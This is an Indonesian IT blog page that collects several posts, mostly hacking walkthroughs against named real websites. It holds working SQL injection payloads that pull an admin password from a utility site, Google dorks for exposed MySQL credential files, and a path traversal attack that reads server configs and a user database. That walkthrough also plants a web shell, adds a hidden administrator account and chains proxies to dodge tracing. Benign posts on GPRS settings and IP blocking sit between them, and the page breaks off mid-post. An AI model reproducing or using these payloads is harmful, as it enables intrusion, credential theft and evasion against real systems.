Tutorial HTML dan CSS

Posted by Author On Month - Day - Year

Hypertext Markup Language merupkan standard bahasa yang di gunakan untuk menampilkan document web, yang bisa anda lakukan dengan HTML yaitu:

POST-TITLE-HERE

Posted by Author On Month - Day - Year

POST-SUMMARY-HERE

POST-TITLE-HERE

Posted by Author On Month - Day - Year

POST-SUMMARY-HERE

POST-TITLE-HERE

Posted by Author On Month - Day - Year

POST-SUMMARY-HERE

POST-TITLE-HERE

Posted by Author On Month - Day - Year

POST-SUMMARY-HERE

Bobol Web SQL Injection

Dikirim oleh - Andy - IT Share - On 09.51 0 Komentar

Hingga Maret 2006, masih saja terdapat situs web di Republik Indonesia yang dibobol dengan teknik SQL Injection. Anda tahu betapa berbahaya bug yang satu ini ? Berikut akan kita sajikan step by step SQL Injection ini yang diambil dari langsung tulisan iko (iko94@yahoo.com)

Catatan : kita akan membatasi bahasan pada SQL Injection di MS-SQL Server.
Kita akan mengambil contoh di site www.pln-wilkaltim.co.id


Ada dua kelemahan di site ini, yaitu:
1. Tabel News
2. Tabel Admin

Langkah pertama, kita tentukan lubang mana yang bisa di-inject
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.

Kita ambil yang termudah dulu, dengan cara input box. Kemudian kita cari kotak login yang untuk admin.
Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang biarkan aja): ‘ having 1=1–
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
di www.neoteker.or.id ini (lihat arsip sebelumnya).
Kemudian akan keluar pesan error:
——————–
Microsoft OLE DB Provider for ODBC Drivers (0×80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
‘T_ADMIN.NOMOR’ is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
——————–
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR

Kemudian kita akan mencari nama field-field berikutnya,
beserta nama tabel yang mungkin berbeda-beda.
Kita inject di kotak NIP (password terserah):
‘ group by T_ADMIN.NOMOR having 1=1–
Akan keluar pesan error:
——————–
Microsoft OLE DB Provider for ODBC Drivers (0×80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
‘T_ADMIN.NIP’ is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
——————–
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP

Kemudian kita cari field ke tiga :
‘ group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1–
Akan keluar pesan error:
——————–
Microsoft OLE DB Provider for ODBC Drivers (0×80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
‘T_ADMIN.PASSWORD’ is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
——————–
Catat field ke tiga : T_ADMIN.PASSWORD

Lakukan langkah di atas sampai kita menemukan field terakhir.

Berikut adalah pesan error yang terjadi, jika kita mengecek
field terakhir dengan meng-inject:
‘ group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1–
(catatan : kalimat harus 1 baris, tidak dipotong)
——————–
- NIP atau Password atau Unit Anda salah !! -
——————–
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),
ini akan mempermudah proses kita selanjutnya.

Langkah berikutnya, kita menentukan jenis struktur field-
field tersebut di atas.

Kita inject di kotak NIP (pass terserah) :
‘ union select sum(NOMOR) from T_ADMIN–
Arti dari query tersebut adalah : kita coba menerapkan
klausa sum sebelum menentukan apakah jumlah kolom-kolom
di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)
yang berlaku untuk type kolom numerik, jadi untuk type kolom
yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :
——————–
Microsoft OLE DB Provider for ODBC Drivers (0×80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
——————–
artinya kolom NOMOR berjenis numerik.

Berikutnya kita inject :
‘ union select sum(NIP) from T_ADMIN–
Akan keluar pesan error :
——————–
Microsoft OLE DB Provider for ODBC Drivers (0×80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
——————–
Artinya kolom NIP bertype char.

Kita harus mengulang perintah di atas untuk kolom yang
berikutnya dengan jalan mengganti nama_kolom di :
‘ union select sum(nama_kolom) from T_ADMIN–
dengan kolom yang berikutnya.
Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

Langkah berikutnya, kita akan mencari isi kolom password,
untuk user admin, dengan meng-inject :
‘ union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > ‘a’–
artinya kita memilih minimum nama user yang lebih besar dari ‘a’
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih
kolom NAMA, dan mengabaikan 6 kolom yang lain.
Akan keluar pesan error :
——————–
Microsoft OLE DB Provider for ODBC Drivers (0×80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value ‘bill ‘ to
a column of data type int.
/sipm/admin/dologin.asp, line 7
——————–
Anda lihat :
varchar value ‘bill ‘
‘bill’ itu adalah nama user di record yang terakhir dimasukkan,
atau isi kolom NAMA di record yang terakhir dimasukkan.

Selanjutnya kita inject :
‘ union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = ‘bill’–
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
———————
Microsoft OLE DB Provider for ODBC Drivers (0×80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value ‘m@mpusk@u’ to a
column of data type int.
/sipm/admin/dologin.asp, line 7
———————
Artinya kita berhasil !!!
Kita dapatkan
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u

Silahkan login ke :
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan anda
isi sendiri dengan cara coba-coba :(

Atau kita pakai jalan pintas saja….

Kita inject-kan :
‘ union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA =’bill’–
catatan : harus satu baris.
Duarrrrrr……….
Glhodhak………….
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!

Lubang ke dua adalah pada bagian berita.
Pada dasarnya berita di situ adalah isi dari tabel yang
lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.
Contoh :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
ada parameter id dan idSM.
Setelah kita coba inject, ternyata yang berpengaruh adalah
parameter id aja (CMIIW).

Kita inject-kan :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119′ having 1=1–
akan keluar pesan error :
—————————
Microsoft OLE DB Provider for ODBC Drivers (0×80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
‘tb_news.NewsId’ is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
—————————
artinya ‘tb_news.NewsId’ itulah nama tabel dan kolom kita
yang pertama.

Ulangi langkah-langkah kita di atas sampai didapatkan :
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime

Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan
pengetahuan anda.
Anda bisa men-insert berita yang bisa anda tentukan sendiri
isinya.

Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.

Perkiraan saya, nama-nama partai di situs KPU yang di-hack
oleh Shizoprenic, juga ada di tabel-tabel suatu database,
jadi tetep bisa dimasuki dengan cara SQL Injection ini.

******************************************************
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
******************************************************
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula
akan bingung sejenak melihat input box nya gak bisa di
inject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan
tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar
dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,
Extended Stored Procedures jika memungkinkan.
5. Ubah “Startup and run SQL Server” menggunakan low privilege user
di SQL Server Security tab.

Yah itulah mungkin yang dapat saya ceritakan…..
Hal itu adalah gambaran, betapa tidak amannya dunia internet…
Kalau mau lebih aman, copot kabel jaringan anda, copot disk
drive anda, copot harddisk anda, jual kompie anda !!!
Just kidding :))

Referensi :
[+] sqlinjection, www.BlackAngels.it
[+] anvanced sql injection in sql server applications
(www.ngssoftware.com)
[+] sql injection walktrough (www.securiteam.com)

Special greets :
[+] www.neoteker.or.id
[+] www.bosen.net
[+] ftp_geo
[+] Schizoprenic (XNuxer Research Center) –> BEBASKAN DIA !!!

Kiriman dari : Syamsi Kusyanti
Thu, 20 Jul 2006 08:29:04 +0700


Read More...

Setting GPRS

Dikirim oleh - Andy - IT Share - On 07.28 0 Komentar

Setting GPRS Matrix / Mentari
Profile Name : satelindoHomepage URL : http://wap.matrix-centro.comIP Address : 202.152.162.250:9200Bearer : GPRSUser Name :Password :APN : satelindogprs.com
Activate GPRS : ACTGPRS ACT GPRS kirim ke 888Call Center : (021) 5438 8888 atau 222 (dari handphone)
Setting GPRS simPATI (Telkomsel)
1. Menggunakan ponsel dengan fasilitas GPRS.
2. Masih memiliki pulsa minimum Rp. 500,- dibawah nilai tersebut Anda tidak dapat menggunakan layanan GPRS, MMS maupun SMS.
3. Mendaftar sebagai pelanggan GPRS, yang hanya dapat dilakukan melalui SMS.
Caranya :- Ketik pesan SMS : GPRS [Nomor Kartu]- Contoh : GPRS 6210009922069556- Kirim ke : 6616


Catatan :- Tarif pesan kirim SMS : Rp. 350 ,- / pesan.- Nomor kartu merupakan nomor ICCID (Integrated Circuit Card Identification) yang terdiri dari 16 (enam belas) digit nomor dan terdapat di belakang chip kartu simPATI Nusantara Anda.- Isi pesan tidak tergantung pada huruf besar atau kecil (non case sensitive).- Dalam pengetikan nomor kartu tidak boleh ada spasi.
4. Sistem akan memberikan pesan notifikasi SMS kepada Anda setelah beberapa waktu untuk memberitahukan bahwa permintaan aktivasi sedang diproses : “Your request for GPRS Setup already received. Please wait for max. 48 hours for succesfull activation notification message.”
5. Pemrosesan aktivasi membutuhkan waktu maksimum 48 jam.
6. Setelah proses aktivasi sukses dilakukan, sistem akan memberitahukan kepada Anda melalui SMS dari 6616 : “Welcome to GPRS Service! Your GPRS service has been activated. Please visit www.telkomsel.com for more information”
7. Melakukan setting pada terminal komunikasi yang digunakan dengan parameter-parameter seperti berikut :
• Connection Name : APN Telkomsel• Data Bearer : GPRS• Access Point Name : telkomsel• Username : wap• Prompt Password : No• Password : wap123• Authentication : Normal• Homepage : http://wap.telkomsel.com• WAP Gateway IP Address : 10.1.89.130• Port : 9201 (standard), 8000 (proxy)
8. Berada di wilayah layanan GPRS.
9. Untuk menggunakan WAP Telkomsel dengan GPRS, pastikan Anda telah terdaftar pada www.telkomsel.com.
10. Untuk menggunakan WAP Telkomsel dengan GPRS, pastikan Anda melakukan setting handset untuk menggunakan Access Point Name (APN) telkomsel.
Setting GPRS kartuHALO (Telkomsel)
1. Menggunakan ponsel dengan fasilitas GPRS.
2. Mendaftar sebagai pelanggan GPRS, pendaftaran dapat dilakukan di GraPARI atau hubungi Caroline di nomor 111, layanan bebas pulsa dari kartuHALO Anda, atau dapat dilakukan melalui SMS :
Caranya :- Ketik pesan SMS : GPRS- Contoh : GPRS- Kirim ke : 6616
Catatan :- Tarif pesan kirim SMS : Rp. 250 ,- / pesan.
3. Sistem akan memberikan pesan notifikasi SMS kepada Anda setelah beberapa waktu untuk memberitahukan bahwa permintaan aktivasi sedang diproses : “Your request for GPRS Setup already received. Please wait for max. 48 hours for succesfull activation notification message.”
4. Pemrosesan aktivasi membutuhkan waktu maksimum 48 jam.
5. Setelah proses aktivasi sukses dilakukan, sistem akan memberitahukan kepada Anda melalui SMS dari 6616 : “Welcome to GPRS Service! Your GPRS service has been activated. Please visit www.telkomsel.com for more information”
6. Melakukan setting pada terminal komunikasi yang digunakan dengan parameter-parameter seperti berikut :
• Connection Name : APN Telkomsel• Data Bearer : GPRS• Access Point Name : telkomsel• Username : wap• Prompt Password : No• Password : wap123• Authentication : Normal• Homepage : http://wap.telkomsel.com• WAP Gateway IP Address : 10.1.89.130• Port : 9201 (standard), 8000 (proxy)
7. Berada di wilayah layanan GPRS.
8. Untuk menggunakan WAP Telkomsel dengan GPRS, pastikan Anda telah terdaftar pada www.telkomsel.com.
9. Untuk menggunakan WAP Telkomsel dengan GPRS, pastikan Anda melakukan setting handset untuk menggunakan Access Point Name (APN) telkomsel.
Setting GPRS XL
* Setting GPRS/MMS Secara Otomatis
Kirimkan SMS berikut ke 9667, hanya Rp. 350,- (sudah termasuk PPN untuk pengguna bebas dan belum termasuk PPN untuk pengguna Xplor).o Untuk setting GPRS:GPRSo Untuk setting MMS:MMS
Penulisan merk dan tipe ponsel (tidak case sensitive) :
MERK
TIPE (pilih salah satu)
NOKIA atau NOK
3100, 3200, 3220, 3300, 3510, 3510i, 3520, 3530, 3560, 3650, 3660, 5100, 6100, 6108, 6200, 6220, 6225, 6230, 6340i, 6600, 7610, 6610, 6610i, 6650, 6800, 6810, 6820, 7200, 7210, 7250, 7600, 7650, 7700, 8910i, N-Gage, N-Gage QD, 9500
SONYERICSSON atau ERICSSON atau SE
T39m, T68, T68i, T230, T300, T310, T610, T630, P800, P900, P910, Z200, Z600, K700i, K500i, S700i
SIEMENS
S57, SL55, SX1, C62, S65, SL65, CX65
SAMSUNG
X100, X600, E700
Untuk aktivasi GPRS/MMS di sistem, hubungi Customer Service XL di 818 melalui nomor bebas/Xplor Anda (bebas pulsa) atau 021 57959818 melalui nomor lainnya (dikenakan tarif sesuai dengan yang berlaku).
* Setting GPRS/MMS Secara Manual
Setting Parameter GPRS :
o Connection name : XL GPRSo Data bearer : GPRSo Access point name : www.xlgprs.neto User name : xlgprso Prompt Password : Noo Password : proxlo Authentication : Normalo Homepage : http://wap.lifeinhand.como Connection Security :- offo Session mode : permanento Phone IP address : Automatico Primary name server : 0.0.0.0o Secondary name server : 0.0.0.0o WAP Gateway IP Address : 202.152.240.50o Port : 9201 (standard), 8080 (proxy)
Setting GPRS IM3
* Setting GPRS Secara Otomatis
Kirim SMS ke 3939 dengan isi pesan :
GPRS [Merk HP] [Type HP]
Contoh :- GPRS Nokia 7650- GPRS Ericsson T68- GPRS SE P800
* Setting GPRS Secara Manual
Setting Parameter GPRS :
o Connection name : M3-GPRSo Access point name : www.indosat-m3.neto User name : gprso Password : im3o Authentication : Normalo Homepage : http://wap.indosat-m3.neto IP address : 010.019.019.019o Port : 9201 (standard), 8080 (proxy)
dari http://www.studiohandphone.com/setting_gprs.php


Read More...

Memblokir IP Pengunjung Web

Dikirim oleh - Andy - IT Share - On 12.31 5 Komentar

Karena alasan tertentu, mungkin webmaster/admin perlu memblokir IP address pengunjung web site. Untuk tujuan tersebut, anda dapat menggunakan konfigurasi file .htaccess.



Caranya anda cukup menuliskan
deny from “alamat ip”

Misal untuk memblokir alamat ip 222.124.24.107 anda bisa menuliskannya:

===================
deny from 222.124.24.107
===================
pada file .htaccess


Read More...

Pencurian Data pada Web Server

Dikirim oleh - Andy - IT Share - On 11.24 0 Komentar

Internet memang memberi kita banyak kemudahan. Salah satunya dengan memanfaatkan web server. Pada web server kita dapat menyimpan data dan dokumen dan bisa kita akses kapanpun darimanapun dengan menggunakan akses internet. Menyimpan data di webserver banyak dilakukan karena membantu mobilitas kerja.Namun demikian, kemudahan itu tidak sesederhana dengan apa yang kita lihat. Data yang tersimpan pada web server memiliki potensi besar untuk dibaca bahkan dicuri oleh orang lain. Bagaimana jika data tersebut merupakan dokumen penting dari perusahaan yang tidak boleh diketahui oleh orang lain? Lebih-lebih jika perusahaan kompetitor menyewa seorang hacker untuk mencuri data di web server perusahaan kita. Bahaya.



Pertanyaannya adalah apakah pencurian ini bisa terjadi? Jawabannya memang relatif. Tetapi bukan berarti data tersebut dijamin tidak bisa diakses oleh orang yang tidak kita ijinkan. Dengan teknologi segala sesuatunya menjadi mungkin.

Di internet, pencurian data dapat dilakukan dengan cara yang cukup mudah, bahkan bisa dilakukan dengan menggunakan teknik dasar yang sederhana. Boleh percaya boleh tidak, orang dapat melakukan pencurian data hanya dengan menggunakan search engine. Tulisan berikutnya tidak bermaksud untuk mengajarkan cara untuk melakukan pencurian data, tetapi lebih kepada update knowledge agar kita dapat melakukan pencegahan pencurian data milik kita yang tersimpan dalam web server.

Dengan teknik berikut kita akan melakukan pengujian dengan apa yang dikenal oleh orang orang dari komunitas ’underground’ sebagai Teknik Traversal. Dalam konteks ini teknik traversal secara sederhana dapat diartikan sebagai ”melintas” suatu tempat. Tentunya tempat yang dimaksud adalah server penyimpan data. Mereka dapat menggunakan teknik traversal untuk mengembangkan kesempatan yang kecil menjadi kemungkinan yang jauh lebih besar.

Sebagai ilustrasi, dengan mengetahui bagaimana teknik traversal dapat melakukan pencurian data, mari kita buktikan apa yang dapat dilakukan oleh teknik ini. Kita dapat menggunakan search engine Google (www.google.com) untuk memulainya. Pada layar Google, ketikan query code berikut: intitle:index.of inurl:”/admin/*”. Dalam waktu sekejap, Google akan memberikan ribuan hasil pencarian berisi situs-situs yang menampilkan folder admin.

Gambar di atas adalah hasil dari query yang kita minta pada Google. Pilihlah salah satu URL tersebut lalu mengkliknya.

Tampilan yang dihasilkan merupakan direktori paling dasar dari result yang dihasilkan oleh teknik traversal. Mereka dapat eksplorasi tiap dan semua directory, subdirektori bahkan ke direktori admin untuk mencari file yang mereka inginkan. Dengan melakukan kombinasi dan modifikasi pada query pada engine Google mereka dapat lebih leluasa untuk berjalan-jalan pada situs target. Misalnya dengan mengganti kata “admin” menjadi “student” atau “public”.

Kelebihan lainnya dari teknik traversal ini akan mengijinkan mereka untuk memanfaatkan ‘cacat’ yang ada pada webserver dan berkeliling ke pohon direktori di luar direktori web server.

Sebagai contoh, jika web server terinstall di dalam direktori /var/www dan data publik ditempatkan di direktori /var/www/htdocs, secara default mereka yang melakukan serangan pada top level directory pada web server dapat melihat file yang ditempatkan di /var/www/htdocs. Pada keadaan normal, web server tidak akan menginjinkan orang untuk melihat file yang ditempatkan pada direktori /var atau direktori /var/www. Tapi dengan menggunakan kombinasi query, masih banyak web server yang menginjinkan mereka untuk berjalan-jalan di dalamnya.

Coba kita kita pilih salah satu URL link yang dihasilkan oleh Google. Kita dapat bereksplorasi di dalamnya bukan? Bahkan kita bisa masuk ke dalam subdirektori user. Cobalah dibayangkan saat ini Anda sedang ’berjalan-jalan’ pada web server milik sendiri dimana Anda menyimpan data-data penting di dalamnya.

Sekali lagi saya katakan bahwa dengan teknik yang sederhana seperti itu saja bisa melakukan pencurian data, apalagi jika mereka menggunakan teknik yang lebih tinggi. Jangankan data dalam web server, data yang ada didalam komputer pribadi kita pun bisa saja dicuri.

Sebagai informasi tambahan, di internet bahkan banyak sekali tools yang dapat dipergunakan untuk membantu melakukan pencurian data. Untuk lebih jelas tentang hal ini, ada baiknya Anda memperdalam pengetahuan mengenai web security. Dengan demikian kita bisa melakukan tindakan pencegahan pencurian data baik di web server maupun data di komputer pribadi kita. Untuk itu kita dapat mencari informasi dari situs yang terkait dengan web security.

Bagi Anda yang sering menyimpan data di web server (pengguna saja) sebaiknya mendiskusikan hal ini ke bagian technical support agar dapat melakukan pencegahan dari tindakan pencurian.


Read More...

Memanen Password MySQL

Dikirim oleh - Andy - IT Share - On 10.57 0 Komentar

Walaupun ide dasar teknik ini saya temukan dari sebuah forum, namun ada baiknya digunakan untuk menambah pengetahuan bersama (maaf bagi kakak2 yg sudah ahli karena tulisan ini ditujukan untuk temen2 yg belum tahu). Kecerobohan seorang webmaster dalam membuat file konfigurasi password sql bisa berakibat fatal. Misalnya saja jika konfigurasi password tersebut disimpan dalam ektensi inc, yg mana biasanya file yg disimpan dalam ektensi tersebut akan bisa langsung dibaca isinya oleh client, tidak seperti jika disimpan dalam ektensi php misalnya.

Mendapatkan password mysql tersebut akan sangat mudah dilakukan dengan bantuan google, misalkan dengan sintax filetype:inc intext:"mysql_connect" site:id ataupun inurl:"password.inc" intext:"password" .



Saya coba memasukkan syntax filetype:inc intext:”mysql_connect” site:id (mencari file berektensi inc yg didalamnya ada kata mysql_connect dan berada di dalam server indonesia, jika syntax site:id dihilangkan maka akan terdapat banyak sekali hasil yg didapat). Terdapat beberapa hasil, kemudian saya coba www.bkpm.go.id.

Saya coba mengakses server tersebut melalui mysql client dari komputer saya, dan ternyata koneksi ditolak. Saya pikir mungkin saya tidak bisa mengakses karena mungkin difilter oleh firewall ataupun memang server tersebut tidak mengijinkan alamat luar untuk mengaksesnya. Kemudian saya coba-coba untuk mengakses server tersebut lewat phpMyAdmin (ternyata phpMyAdmin masih terpasang/digunakan dan membolehkan koneksi dari luar), yaitu http://www.bkpm.go.id/phpmyadmin/ dan ternyata bisa (karena akan dianggap sebagai koneksi dari web servernya sendiri).


Sedangkan contoh server yg membolehkan akses melalui mysql client dari alamat luar adalah 203.149.10.200.


Dari hal2 diatas mungkin bisa sedikit menambah pengetahuan bagi administrator agar lebih berhati-hati dalam mengamankan mysql servernya.


Read More...

Langkah bobol web rasasayang.com.my

Dikirim oleh - Andy - IT Share - On 10.43 0 Komentar

Situs www.rasasayang.com.my secara sekilas terlihat tidak memiliki bug yang cukup berarti untuk dieksploitasi oleh hacker. Namun ternyata masih terdapat celah yang bisa dieksploitasi. Berikut ini langkah-langkah yang dilakukan untuk membobol server ini.

1. Persiapan hacking
2. Pemeriksaan bug
3. Mendownload source code dan file konfigurasi
4. Mengupload file explorer dan windows shell command interface
5.
Mengambil-alih server



Saya akan menjelaskan langkah-langkah di atas satu per satu.

1. Persiapan hacking
Sebelumnya Anda harus memiliki list proxy server yang mendukung proxy-chain untuk menghindari pelacakan. Anda harus mengkoneksikan sekurang-kurangnya 2 anonymous proxy server di 2 negara yang berbeda. Anda dengan mudah mendapatkan proxy server di search engine Google. Namun bila Anda menemukan lebih banyak transparant proxy server, gunakan 3 transparant proxy server yang mendukung chain, dan rutekan koneksinya melintasi beberapa negara, misalnya: Brazil - China - India, sehingga bila dilacak oleh "Pengejar Hacker" maka mereka hanya akan melacak koneksi dari ISP Indonesia ke China.

Pada sistem operasi windows, anda dapat menggunakan software mungil bouncer.exe untuk melakukan proxy-chain melalui parameter tunneling. Contoh dengan IP lokal 192.168.0.5:

bouncer --bind 192.168.0.5 --port 8881 --tunnel 82.0.0.1:8080 --destination 221.0.0.1:8080
bouncer --bind 192.168.0.5 --port 8882 --tunnel 192.168.0.5:8881 --destination 200.0.0.1:3128

Pada contoh di atas, bila kita mengeset proxy pada internet browser menjadi 192.168.0.5:8882 maka koneksi kita akan dirutekan melalui proxy server: 82.0.0.1:8080 -> 221.0.0.1:8080 -> 200.0.0.1:3128 -> www.rasasayang.com.my

Karena kita menggunakan transparant proxy server maka IP 221.0.0.1 juga akan terlacak. Namun ini tidak masalah karena kita sebenarnya terkoneksi dari proxy server 82.0.0.1.


2. Pemeriksaan bug
Pemeriksaan dilakukan secara trial and error pada setiap parameter yang diperkirakan mengandung bug. Pada kasus ini terdapat bug pada module downloading file untuk mendownload file .mp3 dengan URL:

http://www.rasasayang.com.my/index.cfm??dir=download&menu=home&task=dl_comm&cfile=

Dari parameter di atas terlihat file dl_comm.cfm terletak pada folder download. Sekarang kita coba secara langsung mengeksekusi pada file .cfm tersebut dan menyisipkan parameter querystring cfile untuk mendapatkan source codenya.

http://www.rasasayang.com.my/download/dl_comm.cfm?CFILE=..\download\dl_comm.cfm

Ternyata hasilnya adalah file source code dl_comm.cfm. Berikut ini adalah bagian penting dari source code tersebut.



Dari source code ini kita bisa menemukan bahwa terdapat parameter querystring abs_dir dan cfile yang bisa mengarahkan kita untuk mendownload file apa saja dari harddisk server.


3. Mendownload source code dan file konfigurasi

Kita jejaki setiap link di dalam source code-nya, kemudian kita download. Misalnya:

http://www.rasasayang.com.my/download/dl_comm.cfm?CFILE=..\application.cfm
http://www.rasasayang.com.my/download/dl_comm.cfm?CFILE=..\index.cfm

Dari kumpulan file inilah kemudian kita mendapatkan bocoran source code situs www.rasasayang.com.my yang telah diberitakan sebelumnya di situs ini.

Selanjutnya kita download file konfigurasi web servernya dengan cara berikut:

File konfigurasi IIS:
http://www.rasasayang.com.my/download/dl_comm.cfm?abs_dir=C:\&CFILE=..\WINDOWS\system32\inetsrv\MetaBase.xml

File konfigurasi CFM:
http://www.rasasayang.com.my/download/dl_comm.cfm?abs_dir=C:\&CFILE=..\CFusionMX7\lib\neo-query.xml

File History Internet Explorer untuk Administrator
http://www.rasasayang.com.my/download/dl_comm.cfm?abs_dir=C:\&CFILE=..\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat

Dari file Metabase.xml kita dapat mengetahui bahwa terdapat beberapa situs web yang hosting di server ini.
- www.powerofpaytv.com, www.thepowerofpaytv.com yang terletak di E:\webuser\web\powerofpaytv.com
- www.jedrealty.com yang terletak di E:\webuser\web\jedrealty.com
- www.rasasayang.com.my yang terletak di E:\webuser\web\rasasayang.com.my

Dari file index.dat kita dapat mengetahui bahwa Administrator melakukan proses administrasi upload dan download file dengan mengunjungi http://www.powerofpaytv.com/cometadvance/

Dari file neo-query.xml kita dapat mengetahui file database pengguna terletak di E:\webuser\web\powerofpaytv.com\_db\dcm_casbaa_db.mdb yang dapat kita download melalui:
http://www.rasasayang.com.my/download/dl_comm.cfm?abs_dir=E:\&CFILE=..\webuser\web\powerofpaytv.com\_db\dcm_casbaa_db.mdb

Dari file dcm_casbaa_db.mdb ini kita memperoleh user-id dan password dalam bentuk MD5 hash. Dengan menggunakan software decryptor misalnya Cain & Abel kita dapat mendecyrpt passwordnya.


4. Mengupload file explorer dan windows shell command interface
Dari http://www.powerofpaytv.com/cometadvance/ kita dapat mengupload file explorer misalnya ASF File Explorer yang dibuat oleh Nahuel Foronda and Laura Arguello. Dengan ASF File Explorer, kita dapat membrowse file di harddisk secara lebih leluasa, serta meng-upload, download dan delete file.

Untuk windows shell command interface, kita buatkan file.CFM dengan script berikut:



#Replace(Replace(Replace('#cmdResult#', '<', '<', 'all'), '>', '>', 'all'), Chr(10), '
', 'all')#


5. Mengambil-alih server
Kita dapat menambahkan user login windows (group administrator) dengan mengeksekusi perintah berikut pada windows shell command interface.

NET USER mbahjambon mypassword /ADD /ACTIVE:YES /EXPIRES:NEVER /PASSWORDCHG:YES
NET LOCALGROUP Administrators mbahjambon /ADD

Dengan menggunakan Windows Remote Desktop kita dapat mengambil alih servernya (IP 202.157.176.17). Koneksinya tetap dilakukan melalui proxy tunneling seperti contoh berikut:

bouncer --bind 192.168.0.5 --port 8883 --tunnel 82.0.0.1:8080 --destination 221.0.0.1:8080
bouncer --bind 192.168.0.5 --port 8884 --tunnel 192.168.0.5:8883 --destination 202.157.176.17:3389

sehingga kita dapat meremote server melalui Remote Desktop pada alamat: 192.168.0.5:8884

Demikian cara yang digunakan untuk membobol server situs www.rasasayang.com.my. Dengan membaca tulisan ini, mudah-mudahan para pembaca dapat menghindari bug sejenis pada server Anda.


Read More...

Trik Billing Explorer

Dikirim oleh - Andy - IT Share - On 10.21 1 Komentar

Sering kita ke warnet yang banyak mengunci berbagai akses seperti windows explorer tidak bisa dibuka,
klik kanan di desktop tidak bisa, klik kanan di folderpun tidak bisa...betapa sedihnyakan...
apalagi bagi saya yang telah terbiasa dengan shortcut windows xp, misalnya membuka windows explorer:
Win +E, membuka run: Win +R, mencari file di dalam harddisk Win +F, yang mana tombol Win terletak antara
tombol Ctrl dan tombol alt. ingin tahu caranya...nih silakan coba...
Sebenarnya cara ini telah lama saya coba dan ternyata berhasil (praktek di komputer sendiri dan beberapa warnet yang menggunakan billing explorer) Mohon maaf kepada pembuat Billing Explorer...untuk tidak berpanjang lebar langsung aja ya...

==> Pertama Buka GPEdit.msc dulu
caranya:
